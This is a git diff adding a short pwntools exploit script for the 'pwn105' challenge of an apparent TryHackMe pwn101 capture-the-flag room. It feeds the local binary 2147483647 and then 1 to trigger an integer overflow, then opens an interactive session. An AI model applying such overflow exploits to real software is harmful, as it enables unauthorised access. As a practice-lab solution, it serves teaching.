diff --git a/thm_pwn101/pwn105/a.py b/thm_pwn101/pwn105/a.py
new file mode 100644
index 0000000..dddeff2
--- /dev/null
+++ b/thm_pwn101/pwn105/a.py
@@ -0,0 +1,15 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn105", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b">> ", a)
+
+# pop
+s(b"2147483647")
+s(b"1")
+
+r.interactive()
\ No newline at end of file